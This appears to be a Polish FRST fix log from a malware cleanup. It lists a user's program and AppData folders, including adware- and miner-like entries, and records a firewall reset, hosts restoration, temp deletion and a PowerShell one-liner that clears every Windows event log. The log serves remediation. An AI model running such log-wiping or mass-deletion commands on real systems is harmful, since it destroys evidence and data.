2017-03-29 20:34 58D989C5tmp 2017-03-27 23:00 58D989D0_cacayima 2017-03-30 16:54 58DC0EA2tmp 2017-03-29 20:55 58DC0F8A_cacayima 2017-03-30 22:13 58DD2C25tmp 2017-04-02 10:06 58DFD38Ftmp 2017-04-07 20:50 58E521A4tmp 2017-04-05 18:02 58E521AB_cacayima 2017-04-07 20:59 58E7EF9Atmp 2017-04-08 21:57 58E804B2tmp 2017-04-07 22:35 58E804C6_cacayima 2017-04-12 02:27 58ECF6FFtmp 2017-04-11 16:39 58ECF720_cacayima 2017-04-14 18:10 58EFE5A0tmp 2017-04-13 22:02 58EFE5CC_cacayima 2017-04-18 20:50 58F55248tmp 2017-04-20 20:40 58F7638Ftmp 2017-04-22 13:29 58FA75DCtmp 2017-04-21 22:19 58FA75EF_cacayima 2017-04-25 17:03 58FF71D6tmp 2017-04-28 19:05 59025260tmp 2017-05-02 21:05 59085972tmp 2017-05-05 07:44 590BA73Ctmp 2017-05-09 21:05 5910D6C7tmp 2017-05-09 21:05 59117F8Atmp 2017-05-12 21:22 5914D416tmp 2017-05-16 23:25 591A1BD2tmp 2017-05-15 22:28 591A1BEE_cacayima 2017-05-20 00:04 591CCEE5tmp 2017-05-20 18:01 591F7C1Ctmp 2017-05-22 00:52 5921364Ftmp 2017-05-23 21:28 5923699Atmp 2017-05-25 23:26 5925FD0Dtmp 2017-06-02 22:46 59318893tmp 2016-11-29 19:40 7-Zip 2016-11-29 19:40 8d1981d1-7d6c-4ca8-83cc-2c7ae257712e 2016-11-29 19:40 Adobe 2016-11-29 19:40 Alawar.pl 2016-11-29 19:40 AMD APP 2016-11-29 19:40 AMD AVT 2016-11-29 19:40 ATI Technologies 2016-11-29 19:40 Bass Audio Decoder 2017-11-21 20:15 BikaQRss 2017-11-21 20:16 BikaQRssReader 2017-06-12 09:34 Blizzard App 2016-11-29 19:40 BlueStacks 2016-11-29 19:40 ChickenInvadersCOTDSdemo 2017-02-24 22:51 ChomikBox 2016-11-29 19:40 Cisco 2016-11-29 19:40 Cisco Packet Tracer 6.0.1 2016-11-29 19:40 Codemasters 2017-11-21 04:29 Common Files 2016-11-29 19:40 d3e35cd3-ec7d-41c5-b119-bba8e430ac40 2017-04-22 16:12 DAEMON Tools Lite 2016-11-29 19:40 DCoder Image Source 2017-04-05 19:50 deskapp 2009-07-14 05:54 174 desktop.ini 2017-01-10 19:28 Dev-Cpp 2016-11-29 19:40 DirectVobSub 2016-11-29 19:40 Dolby Advanced Audio v2 2016-11-29 19:40 DriverToolkit 2017-08-20 12:25 Electronic Arts 2017-03-01 20:56 Explorer 2016-11-29 19:40 FinalWire 2016-11-29 19:40 FreeGamePick 2016-11-29 19:40 GeoGebra 5.0 2016-11-29 19:40 GIMP-2.0 2017-11-20 15:14 GOG Galaxy 2016-11-29 19:40 GOG.com 2016-11-29 19:40 Google 2016-11-29 19:40 GTX Box Team 2017-06-11 01:12 Hearthstone 2016-11-29 19:40 Heroes & Generals 2016-11-29 19:40 HeroesAndGenerals 2016-11-29 19:40 Hi-Rez Studios 2016-11-29 19:40 HyperCam 2 2016-11-29 19:40 Instalki.pl 2016-11-29 19:40 InstallShield Installation Information 2016-11-29 19:40 Intel 2017-11-20 15:15 Internet Explorer 2016-11-29 19:40 ipla 2016-11-29 19:40 Java 2017-05-31 11:08 k7fap1un 2016-11-29 19:40 LAV Filters 2016-11-29 19:40 Lenovo 2016-11-29 19:40 LG Electronics 2016-11-29 19:40 MadVR 2016-11-30 19:39 Malwarebytes Anti-Malware 2016-12-11 23:50 0 metadata 2017-05-29 20:38 Microsoft Analysis Services 2017-11-20 15:02 Microsoft Office 2017-06-15 02:40 Microsoft Silverlight 2017-05-29 20:42 Microsoft SQL Server 2017-03-13 23:50 Microsoft VS Code 2017-05-29 20:42 Microsoft.NET 2016-11-29 19:40 Minecraft 2016-11-29 19:40 Movavi Screen Capture Studio 7 2017-11-21 20:20 Mozilla Firefox 2016-11-29 19:40 Mozilla Maintenance Service 2016-11-29 19:40 MSBuild 2017-04-26 21:35 MSECache 2017-05-31 11:59 n1 2017-11-20 15:14 Norton Internet Security 2017-11-21 00:10 NortonInstaller 2016-11-29 19:40 Notepad++ 2016-11-29 19:40 OpenOffice 4 2016-11-29 19:40 Opera 2016-11-29 19:40 PhotoScape 2016-11-29 19:40 PITy 2016-11-29 19:40 PlayReady 2016-11-29 19:40 predm 2016-11-29 19:40 Realtek 2016-11-29 19:40 Reference Assemblies 2016-12-11 23:50 reports 2016-11-29 19:40 Samsung 2017-03-14 00:34 40 settings.dat 2017-10-24 23:19 Skype 2017-02-19 00:07 TeamViewer 2017-04-14 07:48 Terela 2016-11-29 19:40 The Sims 2 2016-11-29 19:40 Uninstall Information 2016-11-29 19:40 WebcamMax 2016-11-29 19:40 Windows Defender 2016-11-29 19:40 Windows Mail 2017-11-20 15:15 Windows Media Player 2016-11-29 19:40 Windows NT 2016-11-29 19:40 Windows Photo Viewer 2016-11-29 19:40 Windows Portable Devices 2016-11-29 19:40 Windows Sidebar 2016-11-29 19:40 WinRAR 2017-02-06 23:34 WinSnare(4.0.8) 2017-02-10 00:57 WinSnare(4.0.9) 2017-02-20 23:33 WinSnare(4.1.0) 2016-11-29 19:40 Zoom Player 3 plik(˘w) 214 bajt˘w 145 katalog(˘w) 299˙750˙735˙872 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files\Common Files\System" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: E2E4-D2C4 Katalog: C:\Program Files\Common Files\System 2014-11-14 12:32 . 2014-11-14 12:32 .. 2017-05-10 02:24 ado 2009-07-14 02:40 29˙184 DirectDB.dll 2009-07-14 18:55 en-US 2017-05-10 02:24 msadc 2014-11-14 12:32 Ole DB 2009-07-14 18:55 pl-PL 2011-10-01 06:45 886˙784 wab32.dll 2009-07-14 02:33 1˙098˙752 wab32res.dll 3 plik(˘w) 2˙014˙720 bajt˘w 7 katalog(˘w) 299˙750˙735˙872 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files (x86)\Common Files\System" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: E2E4-D2C4 Katalog: C:\Program Files (x86)\Common Files\System 2017-05-29 20:40 . 2017-05-29 20:40 .. 2017-05-10 02:24 ado 2009-07-14 02:15 24˙064 DirectDB.dll 2009-07-14 18:55 en-US 2017-05-10 02:24 msadc 2017-05-29 20:40 MSMAPI 2017-05-29 20:42 Ole DB 2009-07-14 18:55 pl-PL 2011-10-01 05:37 708˙608 wab32.dll 2009-07-14 02:11 1˙098˙752 wab32res.dll 3 plik(˘w) 1˙831˙424 bajt˘w 8 katalog(˘w) 299˙750˙735˙872 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\ProgramData ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: E2E4-D2C4 Katalog: C:\ProgramData 2017-11-21 20:19 . 2017-11-21 20:19 .. 2017-06-11 12:04 .mono 2014-11-14 08:47 Adobe 2016-01-12 23:54 AlawarWrapper 2014-11-12 22:35 AMD 2015-10-31 22:00 APN 2017-03-14 00:34 Apple 2009-07-14 06:08 Application Data [C:\ProgramData] 2014-11-14 09:53 ATI 2016-11-29 19:40 AVAST Software 2016-11-29 19:40 Avg 2016-11-29 19:40 Avira 2017-06-09 23:39 Battle.net 2016-12-19 16:25 beibe 2014-12-28 12:42 Blizzard Entertainment 2015-04-16 22:15 BlueStacks 2016-03-10 21:34 BlueStacksSetup 2016-01-18 16:49 CanonBJ 2017-11-06 15:49 CDProjekt RED 2017-10-12 02:24 ChelfNotify 2014-11-12 22:18 Conexant 2014-11-28 19:19 DAEMON Tools Lite 2014-11-12 21:20 Dane aplikacji [C:\ProgramData] 2009-07-14 06:08 Desktop [C:\Users\Public\Desktop] 2009-07-14 06:08 Documents [C:\Users\Public\Documents] 2014-11-12 21:20 Dokumenty [C:\Users\Public\Documents] 2014-11-13 17:58 Downloaded Installations 2014-11-12 22:20 0 DP45977C.lfl 2017-08-20 12:35 EA Core 2017-08-20 12:35 Electronic Arts 2017-02-23 22:46 Energy Management 2009-07-14 06:08 Favorites [C:\Users\Public\Favorites] 2014-12-01 20:49 GG 2017-11-06 07:42 GOG.com 2015-02-22 12:00 Hi-Rez Studios 2016-05-08 22:42 1˙140 HirezPipeError.txt 2014-12-09 13:29 Intel 2015-09-07 16:38 InterAction studios 2016-01-31 20:16 ipla 2015-02-22 12:16 IsolatedStorage 2014-11-14 13:06 Lenovo 2014-11-28 20:02 Logs 2015-09-22 15:45 Malwarebytes 2015-07-14 22:22 McAfee 2014-11-12 21:20 Menu Start [C:\ProgramData\Microsoft\Windows\Start Menu] 2016-11-29 20:42 Microleaves 2017-11-21 20:20 Microsoft 2017-11-19 03:08 Microsoft Help 2015-11-22 19:05 16 mntemp 2016-06-27 18:23 MobileBrServ 2015-11-22 19:05 Movavi Screen Capture Studio 7 2014-11-12 23:07 Mozilla 2017-11-20 15:20 Norton 2014-11-14 09:27 NortonInstaller 2016-11-30 16:48 266 ntuser.pol 2015-11-22 19:05 5˙044 oqztiqep.adk 2016-01-10 11:41 Oracle 2015-09-11 15:40 Origin 2017-11-01 00:50 Package Cache 2014-11-12 21:20 Pulpit [C:\Users\Public\Desktop] 2016-12-19 16:25 QQBrowser 2015-10-09 20:43 RDRM 2017-05-29 20:42 regid.1991-06.com.microsoft 2014-11-12 21:51 Roaming 2016-10-16 18:19 Samsung 2017-10-24 23:20 Skype 2016-09-01 00:02 sozy 2009-07-14 06:08 Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu] 2015-09-14 20:28 Sun 2014-11-12 21:20 Szablony [C:\ProgramData\Microsoft\Windows\Templates] 2014-11-28 20:02 TEMP 2009-07-14 06:08 Templates [C:\ProgramData\Microsoft\Windows\Templates] 2016-09-28 22:42 Tencent 2014-11-29 21:11 Ubisoft 2014-11-12 21:20 Ulubione [C:\Users\Public\Favorites] 2015-11-22 15:22 WebcamMax 2017-02-14 23:36 WinSAPSvc 2016-06-22 20:43 Zoom Player 2015-09-22 15:48 102 {262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat 6 plik(˘w) 6˙568 bajt˘w 74 katalog(˘w) 299˙750˙727˙680 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\Robek\AppData\Local ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: E2E4-D2C4 Katalog: C:\Users\Robek\AppData\Local 2017-11-21 20:20 . 2017-11-21 20:20 .. 2015-07-14 22:31 Adobe 2016-01-11 17:10 AlawarWrapper 2017-05-08 21:37 ANSARE 2015-09-01 15:41 Apps 2014-11-14 09:53 ATI 2017-06-12 09:44 Battle.net 2014-12-28 13:13 Blizzard 2014-12-28 12:42 Blizzard Entertainment 2015-04-16 22:14 Bluestacks 2017-03-14 20:06 bower 2014-11-14 13:01 Broadcom 2016-05-29 12:46 CEF 2017-11-21 18:17 ChomikBox 2017-11-09 22:47 CrashDumps 2015-09-14 20:00 CrashRpt 2016-12-09 17:02 Cupduck 2017-05-21 07:40 CWASRE 2014-11-12 21:21 Dane aplikacji [C:\Users\Robek\AppData\Local] 2015-09-01 15:42 Deployment 2017-10-25 19:50 Diagnostics 2017-05-22 20:45 Disc_Soft_Ltd 2014-11-25 18:24 Downloaded Installations 2014-11-14 12:50 DriverToolkit 2017-11-21 19:55 ElevatedDiagnostics 2015-08-14 22:24 EmieBrowserModeList 2015-08-14 22:24 EmieSiteList 2015-08-14 22:24 EmieUserList 2017-01-18 18:49 Firefox 2017-08-20 15:09 Game Updater 2017-10-30 15:10 119˙184 GDIPFONTCACHEV1.DAT 2016-10-10 22:08 GG 2015-09-14 20:01 globalUpdate 2017-10-29 23:51 GOG.com 2016-10-29 23:28 Google 2015-06-01 22:55 GWX 2014-11-12 21:21 Historia [C:\Users\Robek\AppData\Local\Microsoft\Windows\History] 2017-11-21 07:01 4˙695˙528 IconCache.db 2015-09-14 20:00 Installer 2015-03-19 19:10 LG Electronics 2014-11-14 17:25 Macromedia 2017-04-22 16:23 Microsoft 2015-12-27 00:05 Microsoft Games 2017-05-30 11:19 Microsoft Help 2015-06-29 18:55 MiTAC_International_Corpo 2015-11-22 19:07 Movavi 2014-11-12 23:14 Mozilla 2017-06-12 08:17 OfficeBSCache-MyComputer 2014-11-24 17:30 OpenFM 2015-01-20 18:42 Opera Software 2014-11-12 21:46 Programs 2014-11-16 12:07 S2PC 2017-05-04 23:13 SANARE 2015-11-22 19:07 screencapture 2015-11-22 19:06 ScreenCaptureStudio 2017-09-27 16:32 SKIDROW 2014-12-05 18:25 SlimWare Utilities Inc 2017-05-25 23:35 SNARE 2017-05-03 13:11 SNAREA 2016-01-18 16:22 TeamViewer 2017-11-21 20:19 Temp 2014-11-12 21:21 Temporary Internet Files [C:\Users\Robek\AppData\Local\Microsoft\Windows\Temporary Internet Files] 2016-11-29 19:40 Teqasjabther 2017-05-31 11:58 terana 2015-09-21 15:47 Thinstall 2016-03-06 20:20 Unity 2015-10-31 22:19 VirtualStore 2017-05-10 20:45 VNASRE 2017-05-05 21:52 WANARE 2 plik(˘w) 4˙814˙712 bajt˘w 68 katalog(˘w) 299˙750˙727˙680 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\Robek\AppData\LocalLow ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: E2E4-D2C4 Katalog: C:\Users\Robek\AppData\LocalLow 2017-11-21 14:48 . 2017-11-21 14:48 .. 2014-11-12 23:58 Adobe 2017-06-11 12:04 Blizzard Entertainment 2017-11-02 01:40 CDProjektRED 2015-10-09 20:40 EmieBrowserModeList 2015-10-09 20:40 EmieSiteList 2015-10-09 20:40 EmieUserList 2016-10-26 16:35 Heroes and Generals 2015-02-27 23:11 Microsoft 2017-09-22 21:43 MihkelT 2017-10-02 21:37 Mozilla 2016-01-10 11:36 Oracle 2015-10-09 21:00 PlayReady [C:\ProgramData\Microsoft\PlayReady] 2015-01-22 20:07 raidcall 2015-09-14 20:27 Sun 2014-12-25 18:55 Temp 2016-03-06 20:20 Unity 0 plik(˘w) 0 bajt˘w 18 katalog(˘w) 299˙750˙723˙584 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\Robek\AppData\Roaming ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: E2E4-D2C4 Katalog: C:\Users\Robek\AppData\Roaming 2017-11-21 20:20 . 2017-11-21 20:20 .. 2016-06-05 20:20 .minecraft 2017-06-11 12:04 .mono 2016-12-19 16:26 adhad 2014-11-14 08:47 Adobe 2017-11-21 20:13 aMule 2014-11-14 09:53 ATI 2015-02-22 12:01 Awesomium 2017-06-09 23:39 Battle.net 2016-11-29 23:29 Ckichmebcult 2017-03-27 22:53 clean 2017-03-13 23:50 Code 2015-09-15 21:54 cpuminer 2017-05-23 21:56 Cupduck 2015-04-06 18:59 Curse 2017-11-20 15:07 Curse Client 2014-11-28 19:19 DAEMON Tools Lite 2017-01-11 16:50 Dev-Cpp 2017-01-18 18:48 Firefox 2015-07-14 22:54 GeoGebra 5.0 2017-11-20 15:07 GG 2017-05-23 23:29 Google 2017-10-21 12:26 gtk-2.0 2014-11-12 21:21 Identities 2014-11-12 21:56 InstallShield 2014-11-12 21:52 Intel 2014-11-12 22:22 Intel Corporation 2017-11-20 15:14 ipla 2015-02-22 12:16 IsolatedStorage 2015-10-28 20:25 java 2015-03-19 19:13 LG Electronics 2015-09-14 20:36 LSC 2014-11-14 08:47 Macromedia 2009-07-14 19:09 Media Center Programs 2016-11-29 19:23 Microleaves 2017-11-03 19:17 Microsoft 2014-11-12 23:14 Mozilla 2016-09-29 22:59 Notepad++ 2017-03-14 20:05 npm 2017-03-14 20:04 npm-cache 2014-11-24 17:30 OpenFM 2014-11-14 11:27 OpenOffice 2015-01-20 18:42 Opera Software 2017-11-20 15:14 PhotoScape 2016-11-29 19:39 Profiles 2015-01-13 20:57 raidcall 2016-10-16 18:40 Samsung 2017-11-20 15:14 Skype 2017-04-07 00:02 SNARER 2016-01-10 11:38 Sun 2016-02-24 16:47 TeamViewer 2015-09-21 15:47 Thinstall 2014-11-29 21:12 Ubisoft 2017-11-21 14:48 uTorrent 2015-04-18 21:27 Wargaming.net 2016-07-21 23:53 127 WB.CFG 2015-10-08 17:12 WebcamMax 2014-11-12 21:45 WinRAR 2017-04-05 19:50 WinSnare 1 plik(˘w) 127 bajt˘w 59 katalog(˘w) 299˙750˙719˙488 bajt˘w wolnych ========= Koniec CMD: ========= ========================= File: C:\Users\Robek\Desktop\FIX.REG ======================== C:\Users\Robek\Desktop\FIX.REG Brak podpisu cyfrowego MD5: 25A430CE564CCCB0AD8D650C379CD944 Data utworzenia i modyfikacji: 2017-11-21 15:00 - 2017-11-21 15:00 Rozmiar: 000001703 Atrybuty: ----A Firma: Wewnętrzna nazwa: Oryginalna nazwa: Produkt: Opis: Plik Wersja: Produkt Wersja: Prawa autorskie: VirusTotal: https://www.virustotal.com/file/cf6b64ee5434b8bd6d669f6a4e86370499a80bb4c71df9ffcbbefd38487a6b5e/analysis/1386548571/ ====== Koniec File: ====== ========= netsh advfirewall reset ========= Ok. ========= Koniec CMD: ========= C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono Hosts pomyślnie przywrócono. ========= wevtutil el | Foreach-Object {wevtutil cl "$_"} ========= ========= Koniec Powershell: ========= =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 129195934 B Java, Flash, Steam htmlcache => 168700 B Windows/system/drivers => 1372899397 B Edge => 0 B Chrome => 785466789 B Firefox => 384703875 B Opera => 9127764 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 58558176 B systemprofile32 => 651531834 B LocalService => 132244 B NetworkService => 382176 B Robek => 5422218413 B vod => 10704952 B DefaultAppPool => 0 B RecycleBin => 5170290 B EmptyTemp: => 8.2 GB danych tymczasowych Usunięto. ================================ Rezultat przenoszenia plików przy restarcie (Tryb startu: Normal) (Data i godzina: 21-11-2017 20:31:47) Rezultat usuwania kluczy przy restarcie: HKLM\System\CurrentControlSet\Services\NAVENG => klucz niepowodzenie przy usuwaniu. Odmowa dostępu. HKLM\System\CurrentControlSet\Services\NAVEX15 => klucz niepowodzenie przy usuwaniu. Odmowa dostępu. ==== Koniec Fixlog 20:31:47 ====